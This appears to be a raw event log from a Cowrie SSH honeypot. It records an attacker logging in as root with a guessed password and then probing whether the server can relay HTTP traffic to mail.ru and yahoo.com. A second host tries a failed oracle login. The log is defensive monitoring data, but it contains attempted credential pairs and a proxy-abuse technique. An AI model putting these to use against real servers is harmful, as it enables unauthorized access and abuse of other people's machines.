{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.829029Z","src_ip":"77.83.207.83","session":"d726b99afcb8"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.881329Z","src_ip":"77.83.207.83","session":"d726b99afcb8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38248,"dst_ip":"1.2.3.4","dst_port":22,"session":"794c1bd245ed","protocol":"ssh","message":"New connection: 77.83.207.83:38248 (1.2.3.4:22) [session: 794c1bd245ed]","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.931406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.932271Z","src_ip":"77.83.207.83","session":"794c1bd245ed"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:07.983173Z","src_ip":"77.83.207.83","session":"794c1bd245ed"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.237823Z","src_ip":"77.83.207.83","session":"794c1bd245ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32388,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32388","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.290278Z","session":"794c1bd245ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.341539Z","src_ip":"77.83.207.83","session":"794c1bd245ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":29356,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:29356","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.485376Z","session":"794c1bd245ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.536633Z","src_ip":"77.83.207.83","session":"794c1bd245ed"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":8259,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:8259","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.681393Z","session":"794c1bd245ed"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.732502Z","src_ip":"77.83.207.83","session":"794c1bd245ed"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.784136Z","src_ip":"77.83.207.83","session":"794c1bd245ed"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38330,"dst_ip":"1.2.3.4","dst_port":22,"session":"f856fc8c6463","protocol":"ssh","message":"New connection: 77.83.207.83:38330 (1.2.3.4:22) [session: f856fc8c6463]","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.833407Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.842614Z","src_ip":"77.83.207.83","session":"f856fc8c6463"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:08.883857Z","src_ip":"77.83.207.83","session":"f856fc8c6463"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.134757Z","src_ip":"77.83.207.83","session":"f856fc8c6463"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":8347,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:8347","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.185994Z","session":"f856fc8c6463"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.236388Z","src_ip":"77.83.207.83","session":"f856fc8c6463"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10900,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:10900","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.380684Z","session":"f856fc8c6463"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.431069Z","src_ip":"77.83.207.83","session":"f856fc8c6463"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":13974,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:13974","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.572736Z","session":"f856fc8c6463"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.623033Z","src_ip":"77.83.207.83","session":"f856fc8c6463"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.674049Z","src_ip":"77.83.207.83","session":"f856fc8c6463"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38413,"dst_ip":"1.2.3.4","dst_port":22,"session":"33d0c0f283b9","protocol":"ssh","message":"New connection: 77.83.207.83:38413 (1.2.3.4:22) [session: 33d0c0f283b9]","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.723426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.724212Z","src_ip":"77.83.207.83","session":"33d0c0f283b9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:09.775878Z","src_ip":"77.83.207.83","session":"33d0c0f283b9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.029418Z","src_ip":"77.83.207.83","session":"33d0c0f283b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60240,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0222a2b354e","protocol":"ssh","message":"New connection: 212.227.125.160:60240 (1.2.3.4:22) [session: b0222a2b354e]","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.053465Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.056290Z","src_ip":"212.227.125.160","session":"b0222a2b354e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":32642,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:32642","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.080995Z","session":"33d0c0f283b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.131777Z","src_ip":"77.83.207.83","session":"33d0c0f283b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":12315,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:12315","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.277449Z","session":"33d0c0f283b9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.309558Z","src_ip":"212.227.125.160","session":"b0222a2b354e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.328552Z","src_ip":"77.83.207.83","session":"33d0c0f283b9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":18607,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18607","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.473175Z","session":"33d0c0f283b9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.524063Z","src_ip":"77.83.207.83","session":"33d0c0f283b9"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.575434Z","src_ip":"77.83.207.83","session":"33d0c0f283b9"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38494,"dst_ip":"1.2.3.4","dst_port":22,"session":"254ffb5f2abe","protocol":"ssh","message":"New connection: 77.83.207.83:38494 (1.2.3.4:22) [session: 254ffb5f2abe]","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.625595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.626487Z","src_ip":"77.83.207.83","session":"254ffb5f2abe"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.676661Z","src_ip":"77.83.207.83","session":"254ffb5f2abe"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.927336Z","src_ip":"77.83.207.83","session":"254ffb5f2abe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":26375,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:26375","sensor":"my-vps","timestamp":"2025-08-31T03:44:10.978340Z","session":"254ffb5f2abe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.028837Z","src_ip":"77.83.207.83","session":"254ffb5f2abe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10987,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:10987","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.172574Z","session":"254ffb5f2abe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.223176Z","src_ip":"77.83.207.83","session":"254ffb5f2abe"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"test1","message":"login attempt [oracle/test1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.322838Z","src_ip":"212.227.125.160","session":"b0222a2b354e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":961,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:961","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.364851Z","session":"254ffb5f2abe"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.415318Z","src_ip":"77.83.207.83","session":"254ffb5f2abe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48762,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0399dc3c9a5","protocol":"ssh","message":"New connection: 212.227.125.160:48762 (1.2.3.4:22) [session: b0399dc3c9a5]","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.445420Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.465988Z","src_ip":"77.83.207.83","session":"254ffb5f2abe"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38579,"dst_ip":"1.2.3.4","dst_port":22,"session":"f131c3bd9088","protocol":"ssh","message":"New connection: 77.83.207.83:38579 (1.2.3.4:22) [session: f131c3bd9088]","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.514489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.515404Z","src_ip":"77.83.207.83","session":"f131c3bd9088"}
